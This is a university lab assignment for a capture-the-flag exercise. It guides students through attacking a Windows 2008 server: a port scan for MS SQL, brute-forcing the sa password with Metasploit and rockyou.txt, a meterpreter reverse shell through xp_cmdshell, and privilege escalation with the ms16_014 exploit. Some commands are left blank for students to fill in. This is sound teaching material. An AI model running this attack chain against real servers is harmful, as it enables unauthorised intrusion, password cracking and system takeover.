P3.docx
- 1. Project-3: Privilege Escalation-2 In this project, you are assigned to gain privileged access to Windows 2008 Server in a CTF (Capture-the-Flag) event. You will discover that Windows 2008 has a vulnerable MS SQL Service. First, you will exploit these services by using the Metasploit Framework to gain an unprivileged shell. You will use the "exploit suggester” module of the Metasploit Framework and try to gain a privileged shell. In your first try, you will be able to get a privileged shell. Reminder Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting this project. Computers Notes: 1) You will perform all of your actions from Kali Linux. 2) You cannot copy and paste between your computer and the computers on the Netlab environment; however, it will be quicker and more reliable if you use the tab key after writing the first 2-3 letters of each command/command parameters in Metasploit. 3) Use CTRL – to shrink the fonts on the Kali Linux terminal window; alternatively you can click on the View on the menu bar and then Shrink Font menu item. 4) If you get an error like "Meterpreter session # closed. Reason: Died", terminate your reservation and restart the lab unless otherwise specified. The reason for this error is the timeout of the session. IN the second reservation, go through the steps more quickly. Steps of Hacking 1) Scan the network to check for MS SQL service 2) Crack the sa password 3) Get a shell
- 2. 4) Confirm that the shell is low-privileged 5) Get a high-privileged shell 6) Confirm that the shell is high-privileged 7) Gave rise to an information security breach The List of Actions/Commands per Step 1. Scan the network to check for MS SQL service In this part, scan all computers in the network for MS SQL Server service (Port 1433). Use the service detection option you used last week. Run the Nmap with the options described above and take a screenshot(s) of the result that is showing that the port is open on Windows 2008. Type the command here 2. Crack the sa password sa is the most privileged account in an SQL server. This account is usually targeted by hackers, as you will do in this part. You will use Metasploit to crack the password of the sa account in this part. Command Notes gunzip /usr/share/wordlists/rockyou.txt.gz Decompress the password dictionary msfconsole Open Metasploit search mssql_login Find a relevant Metasploit module Type the command here Type in the required command show options See a list of available options. Confirm that the username option has already been set as "sa”. But you still need to set some options.
- 3. Type the command here Set the remote host (SQL Server) to connect, and then the Metasploit module will try passwords remotely by brute-forcing Type the command here Check the username; if you see roo, you have to change it with the correct one set pass_file /usr/share/wordlists/rockyou.txt This is the password list (dictionary) you compressed. You will use this to crack the password. set verbose false Type in this command if you don't want to see a message for all failed login attempts. run Take a screenshot of the terminal window showing the password of the sa account. Note: Take a note of this password; you will use it later on. The completion of this command will take about 80 seconds. 3. Get a shell In this part, you will try to get a shell from Windows 2008 using the xp_cmdshell procedure on MS SQL Server. xp_cmdshell is a dangerous and extended procedure that enables interaction between the MS SQL server and the operating system. You can run Windows commands from SQL server and perform operations like copying files, creating folders, and many others. In this part, you will use a Metasploit payload that exploits xp_cmdshell to create a shell. search mssql_payload Search Metasploit for possible MS SQL payloads use exploit/windows/mssql/mssql_payload This is the Metasploit payload that uses the xp_cmdshell procedure on MS SQL Server show options See the possible options for this payload. By default, the username option has already been set as “sa”. Type the command here Did you see that the RHOSTS parameter is blank? Set it as Windows 2008 server. RPORT has already been set as 1433. Type the command here Set the password of the sa account you cracked in the previous part set payload windows/x64/meterpreter/reverse_tcp You have to set the payload option, although it has not been shown in the options list. This is a global option that applies mssql_payload exploit. Note that mssql_payload uses the xp_cmdshell procedure; however, it needs a mechanism to handle the MS SQL server traffic. This is similar to the analog RC car and RC remote control; remember from the Project-1. Type the command here You have to assign the local counterpart of the host. set lport 443 You have to assign the local counterpart of the port number.
- 4. run or exploit You should be getting a shell after running the exploit. 4. Confirm that the shell is low-privileged Now try some commands to check your privilege level on the shell. Commands Notes shell Switch to Windows 2008 native shell whoami See the currently logged-on user name. It is probably a low-privileged shell. Let’s try doing something that requires privileges. Type the command here Try to add a user account from the command line. Take a screenshot of the terminal window showing the result. Exit Exit from the Window 2008 shell and return to meterpreter shell 5. Get a high-privileged shell In this part, you will use the exploit suggester module to find some exploits for privilege escalation, and then use one of these exploits. background Don’t forget to note the id of the session search suggester This command is to search for the keyword “suggester” and find the correct name of the suggester module.set Type the command here Type in the correct command show options Type the command here Write the correct command run or exploit Run exploit suggester, so that it will suggest some exploits to run on the low-privileged shell to get a high-privileged shell. Type the command here Use ms16_014_wmi_recv_notif. Type in the correct command show options set session # The same session ID should put here as the one you chose for the exploit suggester. Remember, you are trying the exploits suggested by the local_exploit_suggester. run or exploit After running the exploit, you should see the message "Exploit completed, but no session was created." show options This time you will see the options of the payload (reverse_shell_tcp) Type the command here Set the first option of the payload Type the command here Set the second option of the payload option run or exploit You should be getting a shell after running the exploit. You will see a Windows shell instead of a meterpreter shell. (Press enter once)
- 5. 6. Confirm that the shell is high-privileged Now check if you have the privilege to perform the dangerous actions. whoami Take a screenshot of the terminal window showing the username. 7. Gave rise to an information security breach Type the command(s) here Did something that will cause loss of confidentiality, integrity, or availability on the target system. Provide the details. Take screenshots. Please perform anything other than you did in the Project-2. (Don’t create a user account) Weekly Learning and Reflection In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.